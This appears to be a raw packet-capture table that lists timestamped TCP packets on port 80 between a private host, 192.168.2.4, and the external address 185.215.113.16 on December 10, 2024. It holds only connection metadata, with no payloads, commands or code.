Dec 10, 2024 00:42:37.191571951 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.191618919 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.191651106 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.191699028 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.215281963 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.215393066 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.215565920 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.215565920 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.215774059 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.215847015 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.215992928 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.216041088 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.216110945 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.216151953 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.217164993 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.217212915 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.217295885 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.217350006 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.218214035 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.218261003 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.218317986 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.218362093 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.219329119 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.219378948 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.219427109 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.219468117 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.220417023 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.220459938 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.220541000 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.220581055 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.221493959 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.221543074 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.221565962 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.221605062 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.222605944 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.222656012 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.222685099 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.222726107 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.223715067 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.223763943 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.223846912 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.223903894 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.224783897 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.224833012 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.224912882 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.224960089 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.225884914 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.225934982 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.226006985 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.226053953 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.226969957 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.227018118 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.227035999 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.227078915 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.228063107 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.228106976 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.228168011 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.228214979 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.229168892 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.229216099 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.229295015 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.229348898 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.230273008 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.230323076 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.230357885 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.230405092 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.231380939 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.231427908 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.231497049 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.231543064 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.232439041 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.232485056 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.232537985 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.232580900 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.233544111 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.233592033 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.233671904 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.233719110 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.234632969 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.234685898 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.234761953 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.234807968 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.235717058 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.235761881 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.236004114 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.236044884 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.236862898 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.236908913 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.236943007 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.236975908 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.237950087 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.237987995 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.238004923 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.238042116 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.239031076 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.239068985 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.239097118 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.239135981 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.240117073 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.240170002 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.240238905 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.240278959 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.241202116 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.241245031 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.241377115 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.241415977 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.242302895 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.242341995 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.242427111 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.242465019 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.243532896 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.243573904 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.243726969 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.243766069 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.244587898 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.244626999 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.244687080 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.244728088 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.245641947 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.245681047 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.245740891 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.245779991 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.246682882 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.246723890 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.246787071 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.246825933 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.247777939 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.247823000 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.247906923 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.247946024 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.248898029 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.248936892 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.248996973 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.249038935 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.249998093 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.250042915 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.250106096 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.250144958 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.251099110 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.251142025 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.251247883 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.251291990 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.252176046 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.252259016 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.252288103 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.252331972 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.253278017 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.253331900 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.253365993 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.253406048 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.254429102 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.254477024 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.254564047 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.254601955 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.255480051 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.255517960 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.255574942 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.255614996 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.256937981 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.256985903 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.257128954 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.257170916 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.257668972 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.257718086 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.257769108 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.257810116 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.258754015 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.258805990 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.258846045 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.258886099 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.259865999 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.259917021 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.259936094 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.259977102 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.260948896 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.260999918 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.261050940 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.261094093 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.262072086 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.262120008 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.262139082 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.262180090 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.263128042 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.263181925 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.263211966 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.263257980 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.267749071 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.267806053 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.273011923 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.273078918 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.273108959 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.273119926 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.273153067 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.273165941 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.273274899 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.273286104 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.273322105 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.273480892 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.273490906 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.273509026 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.273524046 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.273540020 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.273669004 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.273715019 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.381311893 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.381428957 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.381489992 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.381489992 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.381823063 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.381872892 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.381926060 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.381973982 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.382966042 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.383014917 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.383075953 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.383121967 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.384064913 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.384113073 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.407440901 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.407561064 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.407613993 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.407613993 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.408035040 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.408046961 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.408087969 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.409084082 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.409132004 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.409193039 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.409239054 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.410187006 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.410233021 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.410254955 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.410291910 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.411261082 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.411305904 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.411389112 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.411432981 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.412412882 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.412455082 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.412544012 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.412592888 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.413443089 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.413492918 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.413563013 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.413608074 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.414535999 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.414577961 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.414644003 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.414690971 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.415623903 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.415668011 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.415760994 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.415805101 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.416744947 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.416790962 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.416862011 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.416906118 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.417839050 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.417886019 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.417951107 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.417999029 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.418994904 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.419040918 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.419157028 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.419197083 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.420015097 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.420063019 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.420134068 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.420181990 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.421122074 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.421166897 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.421255112 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.421298981 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.422205925 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.422251940 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.422336102 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.422382116 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.423327923 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.423372984 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.423516035 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.423569918 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.424401999 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.424455881 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.424532890 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.424582005 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.425514936 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.425561905 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.425600052 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.425645113 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.426595926 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.426642895 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.426677942 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.426724911 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.427692890 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.427745104 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.427782059 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.427828074 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.428772926 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.428822041 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.428889990 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.428936958 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.429888964 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.429936886 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.430016041 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.430061102 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.430989981 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.431034088 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.431060076 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.431106091 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.432121992 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.432169914 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.432292938 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.432339907 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.433159113 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.433207035 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.433270931 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.433319092 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.434272051 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.434325933 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.434360981 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.434401035 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.435386896 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.435436010 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.435462952 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.435503006 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.436434984 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.436482906 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.436500072 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.436547041 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.437608004 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.437654972 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.437736034 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.437783957 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.438750029 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.438797951 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.438857079 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.438900948 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.439802885 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.439850092 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.439888000 CET	80	49759	185.215.113.16	192.168.2.4
